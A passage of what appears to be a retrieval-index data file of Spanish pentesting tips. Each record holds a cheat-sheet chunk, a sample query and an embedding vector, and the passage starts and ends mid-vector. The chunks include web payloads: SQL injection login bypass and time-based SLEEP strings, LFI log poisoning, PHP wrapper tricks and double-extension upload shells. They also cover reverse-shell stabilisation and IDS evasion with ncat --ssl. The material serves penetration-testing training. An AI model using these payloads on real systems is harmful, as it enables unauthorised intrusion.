-0.14357, -0.01522, 0.06536, -0.04199, -0.07444, 0.03124, 0.08699, -0.02612, 0.13014, 0.03533, 0.02865, 0.00756, 0.04266, 0.01439, -0.02966, 0.23183, 0.00408, -0.09929, -0.00793, -0.0579, 0.04917, 0.02991, 0.05505, 0.03192, 0.04755, -0.04458, -0.02026, -0.0637, -0.0306, 0.0909, 0.01899, -0.01327, -0.00764, -0.08996, 0.09107, -0.03456, -0.12119, 0.01068, 0.05149, 0.04771, -0.04108, 0.05809, 0.10966, -0.03907, -0.03935, 0.06418, -0.10533, -0.05557, -0.00295, 0.11208, 0.00243, 0.00245, 0.09503, 0.01239, -0.1429, 0.09752, 0.09804, 0.02733, 0.02563, 0.04451, -0.03326, -0.12532, 0.07393, 0.03074, -0.00996, 0.04293, -0.0109, -0.03386, -0.04256, -0.02338, 0.06768, 0.02764, 0.05626, -0.06501, -0.01112, 0.04754, -0.02505, -0.06564, 0.00239, -0.07065, 0.00079, -0.00256, -0.00046, 0.09483, -0.02606, 0.06519, 0.08706, -0.02679, 0.04476, 0.0239, -0.00557, 0.00974, -0.00216, -0.06236, -0.06354, 0.07434, -0.12093, -0.08062, 0.01089, -0.004, 0.04987, -0.02287, -0.05343, -0.00388, -0.03545, 0.07958, -0.04643, -0.06547, -0.02729, -0.00993, 0.05874, -0.0065, 0.09001, -0.01826, -0.02773, -0.05352, -0.03048, 0.00838, 0.09969, 0.03226, 0.03553, 0.06288, 0.02094, -0.00488, 0.02567, -0.03159, -0.06258, -0.04371, -0.02113, 0.04101, 0.0722, -0.00206, -0.02033, 0.06474, -0.00251, -0.01993, -0.06722, 0.03999, -0.01574, 0.02837, 0.0649, -0.04224, 0.06377, 0.05029, -0.02994, 0.01322, 0.02714, 0.01787, 0.06248, -0.06729, -0.02028, -0.04744, -0.08128, -0.02738, -0.04168, 0.02284, -0.04659, -0.01764, -0.00038, -0.0118, -0.00461, 0.04812, -0.09292, 0.02301, -0.001, -0.03412, 0.02165, 0.00134, 0.12118, 0.08515, -0.00869, -0.00347, -0.02347, -0.02089, 0.01272, -0.05292, -0.05417, -0.05958, -0.01001, 0.04024, -0.01288, 0.02241, 0.05583, -0.07415, -0.02282, 0.0064, 0.06956, -0.05259, 0.03428, 0.00476, -0.01033, 0.04294, 0.03326, -0.00071, 0.00539, 0.0105, 0.03013, -0.00511, -0.0061, 0.04694, 0.03262, -0.02931, -0.04001, 0.00494, 0.012, -0.03863, -0.01868, 0.02483, -0.02322, 0.00281, 0.02852, 0.01491, 0.02205, 0.00996, -0.05227]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de enumeraciΓ³n (donde la gente pierde 4 horas)\n\n```\n─ Olvidar UDP ────────────────────────────────────────────\n nmap -sU --top-ports 50 -T4 IP\n SNMP (161), TFTP (69), NTP (123) suelen dar oro\n\n─ Olvidar puertos altos ──────────────────────────────────\n nmap solo escanea top 1000 por defecto\n SIEMPRE: nmap -p- --min-rate=5000 IP (los 65535)\n\n─ Olvidar vhosts/subdominios ─────────────────────────────\n Si te encuentras \"default Apache page\", prueba:\n gobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\n ffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n\n─ /etc/hosts no actualizado ──────────────────────────────\n Si la web carga rara o redirige, mira el \"Host:\" header\n AΓ±ade el dominio a /etc/hosts SIEMPRE que aparezca\n\n─ HTTPS revela hostnames ─────────────────────────────────\n openssl s_client -connect IP:443\n El cert te puede chivar el dominio real\n\n─ Wordlists pequeΓ±as ─────────────────────────────────────\n common.txt = junior level\n Para OSCP: raft-large-words.txt, directory-list-2.3-medium.txt\n gobuster -w /usr/share/seclists/Discovery/Web-Content/raft-large-...\n```\n\n---", "indexar": "que herramienta sirve para escanear todos los puertos de una direcciΓ³n IP", "v": [0.06585, -0.09896, -0.22904, -0.16564, 0.11194, -0.26648, 0.07252, -0.14507, -0.04641, -0.00697, 0.0324, 0.01076, 0.06235, -0.16036, -0.02955, 0.01878, 0.08339, -0.05219, 0.06796, -0.04164, -0.07015, 0.15607, -0.08588, 0.01169, -0.07616, 0.06822, -0.04238, 0.04275, -0.18579, -0.00737, -0.12344, 0.01356, 0.034, -0.04667, -0.09725, -0.21296, 0.03196, 0.06304, 0.04996, 0.11701, 0.00955, 0.03768, -0.08322, -0.04733, 0.03649, 0.01064, -0.00219, -0.00283, 0.05325, 0.03758, -0.11984, -0.14917, -0.06432, 0.04733, -0.09497, -0.00063, 0.08151, -0.02494, -0.03318, -0.11143, -0.12401, 0.06554, -0.08127, -0.07823, -0.01134, -0.08392, -0.0476, -0.00653, -0.09504, -0.05409, -0.06669, -0.0051, -0.00248, 0.08563, -0.00791, -0.0893, 0.00884, 0.09134, 0.02588, 0.05976, 0.09792, 0.0217, -0.15428, -0.05438, -0.06339, -0.05591, 0.04011, -0.13105, 0.05099, -0.14718, -0.01977, 0.05365, -0.02678, 0.07964, -0.01524, 0.02134, 0.0515, 0.0153, -0.00728, -0.03426, 0.11763, 0.00913, -0.11531, 0.06786, 0.07498, 0.06954, 0.04261, -0.05538, 0.04324, 0.057, 0.03675, 0.06018, 0.03653, -0.0468, -0.03317, 0.02821, -0.03453, -0.1189, 0.01016, 0.00158, 0.03467, -0.07778, -0.05116, 0.00144, -0.02288, 0.0432, 0.01151, 0.09873, 0.06582, -0.02462, 0.0097, -0.05624, -0.0946, 0.01245, 0.00906, -0.05629, -0.00106, -0.11314, -0.01098, -0.0202, 0.00942, 0.02971, -0.05694, -0.07888, 0.01571, -0.03722, 0.03051, -0.05362, -0.03181, -0.04186, 0.05193, 0.00756, -0.03673, 0.00807, -0.08343, 0.0828, 0.05442, 0.01187, -0.06671, 0.06263, -0.06384, -0.02906, 0.05748, 0.00386, 0.03565, -0.06725, -0.05031, 0.03581, 0.07062, -0.00117, 0.01315, 0.08162, -0.0211, -0.0579, -0.02412, -0.04604, -0.03273, -0.02762, -0.02548, -0.01289, -0.02397, 0.00443, -0.04647, -0.031, 0.01233, -0.04846, 0.03465, -0.0667, -0.00727, 0.05787, 0.05312, 0.01168, -0.02656, -0.04278, -0.021, 0.00049, -0.02093, -0.03495, 0.03352, -0.03026, 0.01001, 0.01773, 0.00568, -0.02819, 0.03203, 0.04838, -0.03478, -0.0162, 0.00521, 0.04962, -0.00093, -0.0255, 0.02015, -0.02518, -0.03444, -0.00602, 0.0224, 0.04951, 0.00199, 0.04373, -0.03563, 0.00374, -0.00541, 0.00131, -0.02853, 0.03129, 0.0182, 0.00021, 0.00177, -0.01154, 0.02244, -0.00097, -0.05532, -0.03735, 0.02313, -0.0469, 0.01653, -0.01345, -0.02892, -0.0349, -0.00961, -0.00346, -0.00138, -0.0213, -0.01412, -0.07012, -0.00779, 0.01042, 0.00651, -0.05064, -0.04603, 0.0138, 0.02662, -0.00697, 0.00439, -0.02101]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de enumeraciΓ³n (donde la gente pierde 4 horas)\n\n```\n─ Olvidar UDP ────────────────────────────────────────────\n nmap -sU --top-ports 50 -T4 IP\n SNMP (161), TFTP (69), NTP (123) suelen dar oro\n\n─ Olvidar puertos altos ──────────────────────────────────\n nmap solo escanea top 1000 por defecto\n SIEMPRE: nmap -p- --min-rate=5000 IP (los 65535)\n\n─ Olvidar vhosts/subdominios ─────────────────────────────\n Si te encuentras \"default Apache page\", prueba:\n gobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\n ffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n\n─ /etc/hosts no actualizado ──────────────────────────────\n Si la web carga rara o redirige, mira el \"Host:\" header\n AΓ±ade el dominio a /etc/hosts SIEMPRE que aparezca\n\n─ HTTPS revela hostnames ─────────────────────────────────\n openssl s_client -connect IP:443\n El cert te puede chivar el dominio real\n\n─ Wordlists pequeΓ±as ─────────────────────────────────────\n common.txt = junior level\n Para OSCP: raft-large-words.txt, directory-list-2.3-medium.txt\n gobuster -w /usr/share/seclists/Discovery/Web-Content/raft-large-...\n```\n\n---", "indexar": "cual es un programa para descubrir nombres de host ocultos o subdominios en una web", "v": [0.08069, 0.0065, -0.02952, -0.0496, 0.03718, -0.06393, -0.03666, -0.05546, 0.01643, -0.13492, -0.00877, -0.16622, -0.05452, -0.09034, -0.02645, -0.06325, 0.25882, -0.06366, 0.05911, 0.06902, -0.03341, 0.03277, -0.09683, -0.00324, 0.00282, -0.17251, 0.03756, 0.05694, 0.00654, 0.01851, -0.00013, -0.10229, -0.03276, -0.06853, -0.03494, -0.00113, 0.06259, -0.10364, 0.0385, 0.10842, 0.00011, -0.03691, -0.028, 0.12287, -0.01422, -0.00679, -0.15306, 0.04151, 0.06131, -0.17476, -0.04783, -0.02439, -0.06813, -0.05948, 0.0354, -0.1304, -0.04072, -0.10629, -0.04121, 0.0874, 0.00746, -0.01437, 0.05846, 0.01229, 0.0626, -0.11862, -0.05212, 0.12361, -0.10077, -0.00517, 0.08462, 0.00189, 0.12829, 0.03514, 0.06268, 0.0061, 0.0131, -0.06982, -0.01048, -0.03329, -0.01179, 0.02252, 0.01478, 0.16253, -0.1362, -0.04352, -0.01864, -0.031, -0.08738, -0.03849, 0.06997, 0.06853, 0.01859, 0.08172, 0.05376, -0.06745, 0.17739, 0.05666, -0.07487, 0.01155, 0.04604, 0.05454, -0.13486, 0.17264, -0.01317, 0.15233, -0.02583, -0.04302, -0.09551, 0.04002, 0.0485, 0.0134, -0.11287, 0.01203, -0.04377, -0.01012, 0.01586, 0.023, 0.09816, -0.09395, -0.16573, -0.00561, -0.03444, 0.03029, 0.06347, -0.00216, -0.00036, 0.02292, 0.04391, 0.00987, 0.02106, -0.01348, -0.03062, -0.02, -0.05138, -0.05797, 0.05408, 0.01998, 0.05301, -0.01343, 0.00877, 0.00859, -0.00506, 0.04738, 0.07383, 0.0306, 0.08677, -0.04661, -0.03541, 0.02048, -0.0619, 0.07856, 0.01238, 0.0365, -0.06979, -0.02817, -0.03785, -0.03432, -0.09166, 0.03235, -0.02812, -0.01677, -0.04407, -0.0855, -0.01644, -0.03244, -0.04463, -0.01554, 0.04627, 0.02531, 0.01608, 0.09875, -0.00416, -0.06977, -0.00844, 0.02436, -0.01731, -0.09942, 0.03643, -0.00384, -0.02857, 0.0465, 0.04092, 0.08775, -0.03772, 0.01554, 0.02996, -0.0235, -0.07518, -0.03646, 0.00261, -0.04602, -0.08639, 0.0111, -0.04242, 0.00671, 0.01824, -0.00184, 0.06663, -0.05001, -0.05997, -0.03388, 0.01396, 0.00135, -0.02743, -0.0124, -0.04898, -0.00413, 0.0452, 0.04507, 0.03962, -0.08495, 0.01515, -0.02915, -0.01593, -0.01457, -0.09899, 0.02859, -0.03307, 0.031, -0.0353, -0.03091, 0.06164, 0.0288, 0.02902, -0.0601, 0.0767, 0.04628, 0.01082, -0.00787, -0.02882, -0.05564, -0.03865, 0.01397, 0.02235, -0.00741, -0.00027, 0.01046, -0.02148, 0.03241, -0.03654, 0.06463, 0.07643, -0.0103, 0.00193, -0.03289, -0.03005, 0.01637, -0.03451, 0.0298, -0.04585, 0.07557, 0.00776, -0.05404, 0.09403, 0.04008]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas web\n\n```\n─ \"robots.txt es perezoso\" ───────────────────────────────\n Mira tambiΓ©n: sitemap.xml, .git/, .svn/, .htaccess,\n .DS_Store, backup/, old/, dev/, test/, admin/\n\n─ Source HTML / JS ───────────────────────────────────────\n Ctrl+U siempre. Comentarios con creds, paths, endpoints\n JS embebidos con APIs ocultas (LinkFinder, JSparser)\n\n─ LFI β†’ RCE ──────────────────────────────────────────────\n Si tienes LFI bΓ‘sico, prueba:\n /proc/self/environ (con User-Agent malicioso)\n /var/log/apache2/access.log (poison + curl con UA payload)\n php://filter/convert.base64-encode/resource=index.php\n data://, expect://, phar:// (PHP wrappers)\n\n─ Upload \"filtrado\" ──────────────────────────────────────\n Doble extensiΓ³n: shell.php.jpg, shell.phtml, .phar, .pht\n Magic bytes: GIF89a;\n Burp β†’ cambia Content-Type a image/jpeg\n .htaccess para reasignar handler\n\n─ SQLi sin sqlmap ────────────────────────────────────────\n Aprende manual primero. sqlmap a veces miente.\n Para login: ' OR '1'='1'-- - (con space-doble-dash-space)\n Time-based: ' AND SLEEP(5)-- -\n```\n\n---", "indexar": "que herramientas uso para encontrar archivos ocultos en el servidor como .git o .htaccess", "v": [0.1384, -0.0854, -0.11025, -0.15393, 0.03171, -0.17578, -0.08729, -0.04534, 0.08792, 0.0526, -0.15008, -0.0874, 0.03492, 0.04492, 0.08083, -0.02539, 0.14912, -0.1491, -0.0074, 0.00739, -0.10572, 0.1168, 0.05411, -0.01209, -0.11805, -0.06647, 0.14606, 0.11308, -0.18945, 0.01963, -0.00589, -0.05944, -0.09431, 0.08607, -0.12453, 0.00424, 0.01235, 0.0595, -0.03929, 0.0785, 0.0077, 0.04004, -0.08978, 0.11469, -0.0258, -0.11123, 0.05465, -0.05101, 0.06616, -0.0479, -0.05898, -0.1264, -0.20399, 0.05656, -0.00256, 0.01929, 0.07589, -0.15811, 0.03651, -0.05349, -0.16767, 0.03667, -0.0112, 0.03918, -0.01509, -0.03243, 0.0016, -0.02729, -0.17186, 0.07473, -0.04815, 0.06392, 0.0577, -0.02094, 0.04846, -0.01864, 0.0123, -0.04349, -0.02791, -0.02159, -0.02112, 0.02127, -0.00683, 0.05966, -0.11798, -0.06018, 0.0094, -0.04546, 0.01219, -0.02249, 0.07227, 0.0977, -0.13091, 0.02209, 0.02366, -0.07164, 0.07951, -0.10438, -0.00265, -0.06801, 0.01132, 0.03259, -0.02454, 0.11474, 0.06856, 0.08809, 0.10699, 0.00331, -0.01648, -0.02503, 0.12138, 0.0536, 0.01335, 0.07033, 0.02422, -0.02708, 0.02393, 0.00093, 0.0074, -0.04841, 0.0247, -0.04886, -0.07028, 0.03966, 0.02652, -0.0331, 0.04843, -0.01417, -0.05607, -0.09552, 0.00335, -0.08418, -0.0829, 0.04258, -0.08721, 0.06257, 0.097, -0.04354, -0.06917, -0.06584, 0.0457, -0.00546, -0.06308, 0.02713, 0.13173, -0.01471, 0.02611, -0.02219, -0.01831, -0.08961, 0.00357, -0.05292, -0.01954, -0.0406, -0.0826, 0.00273, -0.05492, -0.05071, -0.13058, -0.00666, -0.04112, 0.01212, 0.00335, 0.07, -0.02257, -0.02836, 0.02532, 0.06806, 0.01743, 0.01296, 0.06194, 0.03286, 0.0045, -0.07711, -0.03895, -0.00773, -0.02857, -0.07396, 0.07161, 0.00774, 0.0209, -0.03283, -0.04164, 0.04786, -0.00908, -0.00577, 0.07984, -0.02773, -0.03764, 0.04227, -0.02339, -0.03938, -0.04775, -0.02561, 0.0276, -0.01271, -0.02501, -0.01203, -0.00289, -0.03996, 2e-05, 0.0084, 0.00446, -0.02681, 0.0095, -0.0389, -0.02764, -0.01814, -0.00307, -0.02797, -0.01122, -0.04162, 0.03602, -0.03635, 0.00462, -0.05283, -0.03101, 0.01898, 0.00099, -0.06189, -0.01709, 0.02949, 0.01607, -0.04169, 0.0547, 0.00051, -0.00133, -0.0241, 0.017, -0.00799, -0.05239, -0.02259, -0.04302, 0.00889, 0.01287, -0.06909, -0.01243, 0.00081, -0.03962, -0.01696, -0.01919, 0.02793, 0.03844, -0.02555, -0.00796, -0.05841, 0.0091, -0.03309, -0.03723, 0.00792, -0.02492, -0.02425, 0.00345, -0.03592, -0.03271, 0.00994]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas web\n\n```\n─ \"robots.txt es perezoso\" ───────────────────────────────\n Mira tambiΓ©n: sitemap.xml, .git/, .svn/, .htaccess,\n .DS_Store, backup/, old/, dev/, test/, admin/\n\n─ Source HTML / JS ───────────────────────────────────────\n Ctrl+U siempre. Comentarios con creds, paths, endpoints\n JS embebidos con APIs ocultas (LinkFinder, JSparser)\n\n─ LFI β†’ RCE ──────────────────────────────────────────────\n Si tienes LFI bΓ‘sico, prueba:\n /proc/self/environ (con User-Agent malicioso)\n /var/log/apache2/access.log (poison + curl con UA payload)\n php://filter/convert.base64-encode/resource=index.php\n data://, expect://, phar:// (PHP wrappers)\n\n─ Upload \"filtrado\" ──────────────────────────────────────\n Doble extensiΓ³n: shell.php.jpg, shell.phtml, .phar, .pht\n Magic bytes: GIF89a;\n Burp β†’ cambia Content-Type a image/jpeg\n .htaccess para reasignar handler\n\n─ SQLi sin sqlmap ────────────────────────────────────────\n Aprende manual primero. sqlmap a veces miente.\n Para login: ' OR '1'='1'-- - (con space-doble-dash-space)\n Time-based: ' AND SLEEP(5)-- -\n```\n\n---", "indexar": "como puedo inyectar cΓ³digo PHP usando filtros de archivo para obtener shell remota", "v": [0.08818, -0.06736, -0.07369, -0.14654, 0.03072, -0.17903, 0.06931, -0.04707, -0.07516, -0.05432, -0.10173, -0.03956, 0.08324, -0.08697, 0.01131, -0.07366, 0.03119, -0.04282, 0.05983, -0.12377, -0.0077, 0.00087, -0.13898, -0.13011, -0.08815, -0.00137, 0.04028, 0.13056, -0.12022, -0.14606, 0.12448, -0.03157, 0.10096, 0.0843, -0.1298, 0.08167, 0.11267, 0.05158, -0.09861, 0.10008, 0.02254, 0.08328, -0.20321, 0.07911, -0.00665, -0.00551, 0.05392, 0.00395, 0.05885, -0.03355, -0.01655, -0.13396, -0.14061, 0.02983, 0.01042, -0.0334, 0.07907, -0.18338, 0.0238, 0.09803, -0.05688, -0.0581, 0.05789, -0.02122, -0.02258, -0.01722, 0.05219, 0.01707, -0.14765, 0.01447, -0.10629, 0.07488, -0.03631, -0.0076, 0.01909, 0.07326, -0.04094, -0.12885, -0.03291, -0.00794, -0.08825, -0.04157, 0.01975, -0.01573, -0.08449, -0.15269, 0.01944, -0.05317, 0.03583, -0.11488, 0.13609, 0.00298, -0.01385, 0.0876, 0.01208, 0.00616, 0.01782, 0.02177, -0.01866, -0.0524, -0.0033, -0.0384, 0.03537, 0.12405, 0.16243, 0.04594, 0.11181, 0.00163, -0.02015, -0.03008, 0.03167, -0.05901, -0.0592, 0.006, -0.04598, -0.00221, -0.00036, -0.06161, -0.00743, -0.08151, -0.05077, -0.00489, -0.14487, 0.03216, 0.10288, 0.02353, 0.006, 0.0664, -0.03539, -0.08279, -0.05335, -0.00998, -0.06279, -0.03576, 0.02298, 0.09691, 0.0817, 0.03291, -0.02754, -0.01187, -0.04987, -0.04155, 0.00542, 0.13955, 0.08232, 0.01592, -0.01507, -0.03909, -0.06804, -0.09491, 0.04518, -0.04069, -0.02585, -0.01986, -0.13336, 0.03394, 0.03608, -0.07031, -0.0586, -0.02606, -0.02233, 0.02416, 0.01901, 0.02393, -0.01218, -0.04528, -0.01912, -0.04477, 0.04168, -0.02472, 0.01635, 0.00013, 0.04919, -0.08132, 0.00948, 0.00539, 0.01066, -0.03997, -0.01468, -0.01802, 0.03512, 0.07428, 0.03285, -0.03857, -0.01433, 0.01315, 0.02255, 0.02566, -0.00908, -0.02442, 0.02445, 0.01108, 0.0068, 0.02309, 0.02826, 0.01162, -0.02078, -0.02057, 0.00306, -0.02736, -0.04558, 0.05705, 0.03164, -0.05032, 0.07967, -0.02101, -0.01724, 0.02647, 0.01929, 0.00111, 0.01427, -0.0393, 0.06381, -0.02271, -0.00686, 0.01197, 0.02563, 0.03787, 0.05847, -0.00488, -0.06216, 0.03642, 0.05465, -0.00035, 0.02298, 0.00147, 0.01178, 0.03956, -0.00901, 0.00134, -0.00305, 0.03859, -0.04699, -0.02405, 0.07035, 0.02315, -0.02168, -0.00171, -0.03489, -0.04683, 0.04721, 0.05306, -0.04026, 0.00044, 0.01632, -0.03394, -0.05177, 0.01676, -0.00212, -0.01687, -0.07504, -0.0466, 0.00802, -0.03733, 0.01456, 0.0051]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas web\n\n```\n─ \"robots.txt es perezoso\" ───────────────────────────────\n Mira tambiΓ©n: sitemap.xml, .git/, .svn/, .htaccess,\n .DS_Store, backup/, old/, dev/, test/, admin/\n\n─ Source HTML / JS ───────────────────────────────────────\n Ctrl+U siempre. Comentarios con creds, paths, endpoints\n JS embebidos con APIs ocultas (LinkFinder, JSparser)\n\n─ LFI β†’ RCE ──────────────────────────────────────────────\n Si tienes LFI bΓ‘sico, prueba:\n /proc/self/environ (con User-Agent malicioso)\n /var/log/apache2/access.log (poison + curl con UA payload)\n php://filter/convert.base64-encode/resource=index.php\n data://, expect://, phar:// (PHP wrappers)\n\n─ Upload \"filtrado\" ──────────────────────────────────────\n Doble extensiΓ³n: shell.php.jpg, shell.phtml, .phar, .pht\n Magic bytes: GIF89a;\n Burp β†’ cambia Content-Type a image/jpeg\n .htaccess para reasignar handler\n\n─ SQLi sin sqlmap ────────────────────────────────────────\n Aprende manual primero. sqlmap a veces miente.\n Para login: ' OR '1'='1'-- - (con space-doble-dash-space)\n Time-based: ' AND SLEEP(5)-- -\n```\n\n---", "indexar": "que tecnica manual sirvo para hacer SQLi sin usar sqlmap", "v": [-0.07824, -0.13976, -0.13202, -0.19182, -0.07649, -0.39453, -0.12632, -0.15081, 0.08088, 0.13246, -0.1681, -0.08895, 0.15639, -0.11792, -0.04868, 0.04293, 0.03587, -0.18027, 0.01561, 0.07404, 0.07378, -0.00578, -0.02248, -0.04359, -0.05265, 0.02865, 0.05796, -0.0409, -0.13177, -0.05433, -0.05003, 0.0866, 0.0173, -0.02197, -0.02361, -0.00039, 0.0245, 0.01003, -0.06274, -0.006, -0.10159, -0.10674, -0.15583, 0.04047, 0.09238, -0.01758, 0.12803, 0.00582, -0.03685, 0.02498, -0.07906, 0.00827, -0.10312, -0.05386, -0.06476, -0.06643, 0.11145, -0.04765, 0.08774, -0.03899, -0.03843, -0.05578, 0.0225, 0.03227, 0.01692, -0.0075, 0.13205, -0.08203, 0.01732, 0.11561, -0.05279, 0.07454, -0.00074, -0.0298, 0.01109, -0.01172, 0.04314, -0.00766, 0.09451, -0.03463, -0.16079, -0.01122, -0.08159, -0.0151, -0.02527, -0.05725, 0.15691, 0.09785, 0.04255, -0.0527, -0.04111, -0.01604, 0.02204, -0.07964, 0.09217, -0.03272, -0.01068, 0.02505, -0.01952, -0.00423, 0.04772, -0.07368, 0.00027, 0.07474, 0.0784, 0.03977, 0.13072, -0.00756, -0.03843, 0.00365, 0.03276, 0.06878, -0.08084, 0.04787, -0.00843, 0.01436, 0.04227, 0.01528, -0.10729, 0.02657, 0.00079, -0.05744, 0.03749, 0.0029, 0.00562, -0.03423, 0.04937, 0.08104, -0.01239, 0.01246, 0.00194, -0.04476, -0.04001, -0.02909, -0.03256, 0.04309, 0.026, -0.0439, -0.08409, -0.02818, -0.04878, 0.03631, -0.101, -0.04821, 0.01049, -0.02626, 0.02357, -0.0116, -0.02438, -0.00582, 0.0512, 0.00856, 0.03312, 0.00374, 0.00592, -0.06077, 0.07373, 0.00932, -0.07805, 0.01159, 0.01351, 0.02319, 0.00236, 0.00339, 0.03742, 0.00012, -0.00679, -0.0803, 0.06633, -0.00689, 0.04644, 0.04602, 0.0445, -0.06374, 0.04629, -0.01325, -0.00121, 0.00329, 0.02553, -0.02652, -0.0052, -0.02914, 0.03857, 0.00817, 0.03363, -0.00359, 0.03403, -0.0373, 0.01503, -0.0492, -0.04344, 0.05239, 0.0203, -0.01678, 0.00801, -0.05675, 0.02054, -0.01258, -0.02153, -0.0539, 0.00312, -0.05268, -0.08322, -0.04297, 0.0253, 0.04397, -0.03288, 0.02792, 0.00465, -0.02819, -0.00289, -0.01727, 0.00163, 0.0162, -0.00743, -0.0526, -0.03131, 0.00517, 0.02031, -0.01962, 0.02573, 0.00274, -0.01774, -0.03238, 0.00601, -0.01154, 0.0267, -0.0156, 0.03801, 0.02543, 0.01737, 0.01578, 0.02975, 0.02923, 0.00743, 0.01668, 0.03564, 0.00365, 0.03376, -0.04266, 0.01844, 0.05482, -0.01246, 0.05541, -0.02606, -0.01219, -0.04135, 0.0111, -0.00788, -0.03109, 0.02656, -0.04503, 0.01917, -0.00439, -0.03152, -0.01354]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de shell\n\n```\n─ Shell rota = tortura ────────────────────────────────────\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n Ctrl+Z\n stty raw -echo; fg\n export TERM=xterm\n stty rows 40 columns 120\n (rows/cols los sacas con \"stty size\" en TU kali)\n\n─ Listener equivocado ────────────────────────────────────\n nc clΓ‘sico para Linux victim\n ncat --ssl para evitar IDS\n stty raw -echo + nc para Windows ConPtyShell\n\n─ Egress filtering ───────────────────────────────────────\n El firewall del objetivo bloquea ciertos puertos\n PRUEBA: 80, 443, 8080, 53, 4444. Si nada, ICMP shell.\n```\n\n---", "indexar": "que herramienta sirve para conectar una shell rota con el objetivo en Kali?", "v": [-0.01043, -0.00272, -0.22333, -0.09512, 0.0436, -0.19121, -0.1144, 0.01765, 0.10792, -0.06107, -0.2054, -0.0904, 0.08502, -0.10023, 0.1381, 0.07769, -0.04057, -0.10222, -0.1022, -0.01726, -0.06046, -0.04994, -0.05205, -0.03589, -0.08559, 0.10961, 0.1202, 0.09552, -0.15985, 0.04388, 0.00283, -0.03754, 0.02204, -0.03648, -0.04908, -0.11699, -0.04898, 0.08931, 0.03583, -0.00358, -0.08773, 0.04947, -0.10969, 0.09284, 0.1519, 0.04779, 0.07924, -0.0441, 0.02361, 0.14454, -0.07647, -0.0796, -0.13849, -0.0053, 0.02897, -0.15985, 0.14799, -0.13302, 0.04734, -0.11629, -0.12839, -0.02399, -0.07241, -0.0318, 0.0528, -0.04481, -0.04193, -0.08613, -0.12521, 0.02867, 0.01491, 0.02312, -0.00749, -0.00584, -0.00847, 0.03206, 0.05759, 0.04218, 0.06878, -0.01649, 0.0913, -0.10751, -0.08897, 0.02548, -0.05888, -0.04677, 0.12298, -0.0066, 0.03701, -0.03724, 0.02462, 0.034, 0.01431, 0.04099, 0.02859, -0.01493, 0.00796, -0.06084, -0.00201, 0.04169, 0.14143, -0.07587, -0.07177, 0.08124, 0.00606, -0.03736, 0.0031, -0.00392, 0.00116, 0.0557, 0.03789, -0.01566, 0.04346, -0.05815, 0.00895, -0.00705, -0.04048, -0.08299, -0.0373, -0.06513, 0.03271, 0.01159, -0.06052, -0.0142, -0.04349, 0.04741, -0.14019, 0.04228, 0.04172, -0.01428, 0.0474, 0.03202, -0.09464, 0.03048, -0.06602, -0.02452, 0.08602, -0.1302, -0.03897, -0.04999, 0.02793, 0.04538, -0.01855, -0.09256, 0.02122, 0.01369, 0.04287, -0.01018, -0.02908, 0.01575, 0.00282, -0.03118, -0.01306, 0.04233, -0.03712, 0.0046, 0.01027, 0.02694, -0.01575, 0.04171, -0.04967, -0.06216, 0.01697, -0.00153, 0.0385, -0.06921, -0.05834, -0.04182, 0.10478, 0.02019, 0.0045, 0.07195, 0.04903, 0.00541, -0.01427, -0.00406, -0.02694, -0.02453, 0.05977, -0.07086, -0.0374, 0.0472, -0.03861, -0.07586, -0.02805, -0.03155, 0.04122, 0.00024, 0.01989, 0.04505, 0.03433, 0.01486, 0.00792, -0.07747, 0.02936, -0.01898, -0.02776, -0.03769, 0.07339, 0.04116, -0.01579, 0.00884, 0.01928, -0.0192, 0.02888, 0.06066, -0.04867, -0.02833, -0.01639, 0.06966, 0.02907, 0.00355, 0.08363, 0.02203, -0.00385, 0.02252, 0.05545, -0.02194, -0.00352, 0.1033, 0.02424, 0.00641, 0.01746, -0.0052, -0.01374, -0.00031, -0.00431, -0.0161, 0.00371, -0.00208, -0.01005, -0.01604, -0.00892, -0.00944, 0.03685, -0.01087, 0.0336, -0.01051, -0.05969, -0.05141, -0.02724, 0.05752, -0.00055, -0.03348, 0.00498, -0.04603, -0.01504, -0.00363, -0.02041, -0.07695, -0.02967, 0.03456, 0.06405, -0.05526, 0.02454, -0.03273]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de shell\n\n```\n─ Shell rota = tortura ────────────────────────────────────\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n Ctrl+Z\n stty raw -echo; fg\n export TERM=xterm\n stty rows 40 columns 120\n (rows/cols los sacas con \"stty size\" en TU kali)\n\n─ Listener equivocado ────────────────────────────────────\n nc clΓ‘sico para Linux victim\n ncat --ssl para evitar IDS\n stty raw -echo + nc para Windows ConPtyShell\n\n─ Egress filtering ───────────────────────────────────────\n El firewall del objetivo bloquea ciertos puertos\n PRUEBA: 80, 443, 8080, 53, 4444. Si nada, ICMP shell.\n```\n\n---", "indexar": "cual es la mejor manera de probar si las salidas (egress) del firewall estΓ‘n bloqueando mis conexiones?", "v": [0.03974, 0.05247, -0.13421, -0.14256, -0.04797, -0.07855, 0.01348, 0.00786, -0.0564, -0.12506, -0.0784, -0.04389, -0.01997, 0.07514, 0.05299, -0.00334, -0.05474, -0.02784, -0.02922, -0.10146, 0.004, -0.04997, 0.03953, -0.07578, 